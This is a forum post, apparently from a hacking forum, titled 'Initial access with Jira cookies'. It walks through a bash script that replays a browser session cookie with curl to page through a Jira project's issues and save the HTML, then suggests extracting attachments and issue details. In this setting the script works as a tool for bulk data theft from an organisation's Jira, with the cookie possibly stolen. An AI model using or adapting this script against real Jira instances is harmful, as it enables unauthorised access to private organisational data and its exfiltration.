• XSS.stack #1 – the first literary magazine from the forum's users

Initial access with Jira cookies

dataleak

RAID-массив · User · Registered: 26.05.2024
To scrape Jira without API access, using only a browser session cookie and a pager function in bash, we can write a script that iterates through the paginated Jira issue listing and collects the data. Here is a step-by-step guide:

Prerequisites

  1. Cookie: Obtain a valid cookie from your browser for authentication.
  2. Tools: Ensure you have curl and basic text processing tools (grep, awk, sed, etc.) installed on your system.
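Before going further, a quick preflight check can confirm the tools are actually on the PATH. This is a minimal sketch; the tool list mirrors the prerequisites above:

```shell
#!/bin/sh
# Preflight: report any missing tools before running the scraper.
have_tool() {
    command -v "$1" >/dev/null 2>&1
}

missing=0
for tool in curl grep awk sed; do
    if ! have_tool "$tool"; then
        echo "missing: $tool" >&2
        missing=1
    fi
done
if [ "$missing" -eq 0 ]; then
    echo "all required tools present"
fi
```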

Steps

1. Identify the URL Pattern

Determine the URL pattern for the Jira issue pages. For example, if your Jira instance paginates issues, the URL might look something like this:


Code:
https://your_jira_instance_url/issues/?jql=project=YOUR_PROJECT_KEY&startAt=0

Here, the startAt parameter controls pagination.
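To see what the paginated URLs look like before scraping anything, the startAt sequence can be generated with a small loop. The base URL and page size here are placeholders for your instance:

```shell
#!/bin/sh
# Print the first three paginated search URLs for a hypothetical instance.
JIRA_BASE_URL="https://your_jira_instance_url/issues/?jql=project=YOUR_PROJECT_KEY"
PAGE_SIZE=50

start_at=0
while [ "$start_at" -lt $((PAGE_SIZE * 3)) ]; do
    # Prints URLs with startAt=0, startAt=50, startAt=100
    echo "${JIRA_BASE_URL}&startAt=${start_at}"
    start_at=$((start_at + PAGE_SIZE))
done
```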

2. Retrieve Cookie

From your browser’s developer tools, copy the value of the Cookie header from a request to the Jira instance.
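It is worth confirming that the copied cookie actually authenticates before writing the full script. A rough sketch, where COOKIE and URL are placeholders and the live request is left commented out:

```shell
#!/bin/sh
# Classify the HTTP status of a cookie-authenticated request.
cookie_ok() {
    # 200 means the cookie authenticated; 302/401/403 usually mean
    # the session expired or lacks access to the project.
    [ "$1" -eq 200 ]
}

COOKIE="your_cookie_value"
URL="https://your_jira_instance_url/issues/?jql=project=YOUR_PROJECT_KEY&startAt=0"

# Live check (requires network access to the instance):
# status=$(curl -s -o /dev/null -w '%{http_code}' -b "$COOKIE" "$URL")
# cookie_ok "$status" && echo "cookie valid" || echo "cookie rejected ($status)"
```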

3. Write the Bash Script

Create a bash script that uses a pager function to iterate through the pages. Below is an example script:

bash
Code:
#!/bin/bash

# Define variables
JIRA_BASE_URL="https://your_jira_instance_url/issues/?jql=project=YOUR_PROJECT_KEY"
COOKIE="your_cookie_value"
USER_AGENT="your_user_agent"
OUTPUT_FILE="jira_issues.html"
PAGE_SIZE=50 # Number of issues per page (adjust as needed)

# Initialize (truncate) the output file
: > "$OUTPUT_FILE"

# Fetch one page of issues, append it to the output file,
# and print the page body so the caller can inspect it.
fetch_page() {
    local start_at=$1
    local url="${JIRA_BASE_URL}&startAt=${start_at}"
    local page

    echo "Fetching: ${url}" >&2
    page=$(curl -s -b "$COOKIE" -H "User-Agent: $USER_AGENT" "$url")
    printf '%s\n' "$page" >> "$OUTPUT_FILE"
    printf '%s' "$page"
}

# Pager function to iterate through pages
pager() {
    local start_at=0
    local page

    while :; do
        page=$(fetch_page "$start_at")

        # Check the current page only; checking the accumulated output
        # file would never terminate once any page contained the marker.
        if ! grep -q "nextPageUrl" <<< "$page"; then
            break
        fi

        start_at=$((start_at + PAGE_SIZE))
    done
}

# Run the pager function
pager

# Optional: process the HTML output,
# e.g. extract attachments, issue titles, IDs, or other details with grep, awk, sed, etc.

echo "Scraping complete. Output saved to $OUTPUT_FILE."

Explanation

  1. Variables:
    • JIRA_BASE_URL: The base URL for the Jira issues.
    • COOKIE: The cookie for authentication.
    • USER_AGENT: The user agent string to mimic a browser.
    • OUTPUT_FILE: The file where the output will be saved.
    • PAGE_SIZE: The number of issues per page (adjust according to your Jira configuration).
  2. Initialization:
    • Initialize the output file by clearing its content.
  3. fetch_page Function:
    • Takes a start_at parameter to fetch the page starting at that index.
    • Constructs the URL with the startAt parameter.
    • Uses curl to fetch the page and append the response to the output file.
  4. pager Function:
    • Starts at 0 and fetches pages in a loop.
    • Calls fetch_page with the current start_at value.
    • Checks if the fetched page contains a "nextPageUrl" indicator to continue fetching or break the loop if there are no more pages.
  5. Run the pager Function:
    • Calls the pager function to start scraping.
  6. Processing the Output (Optional):
    • After scraping, you can process the HTML output as needed. For example, extracting specific information using grep, awk, or sed.
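As a sketch of that optional processing step, issue keys can be pulled out of the saved HTML with grep. The sample lines below stand in for a real jira_issues.html, and the pattern assumes standard Jira keys like PROJ-123 (adjust it if your project keys differ):

```shell
#!/bin/sh
# Extract unique Jira issue keys (e.g. PROJ-123) from scraped HTML.
OUTPUT_FILE="jira_issues_sample.html"
printf '%s\n' \
    '<a href="/browse/PROJ-101">PROJ-101</a>' \
    '<a href="/browse/PROJ-102">PROJ-102</a>' \
    '<a href="/browse/PROJ-101">PROJ-101</a>' > "$OUTPUT_FILE"

# -o prints each match on its own line; sort -u removes duplicates.
# Prints PROJ-101 and PROJ-102, one per line.
grep -oE '[A-Z][A-Z0-9]+-[0-9]+' "$OUTPUT_FILE" | sort -u
```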

Running the Script

Make sure the script is executable and run it:

bash

Code:
chmod +x jira_scrape.sh
./jira_scrape.sh

This approach scrapes the Jira pages by iterating through the paginated results, authenticating with a cookie, and saving the combined HTML output to a file. You can then process the output file to extract the required information; adjust the parsing to the HTML structure of your specific Jira instance.
 

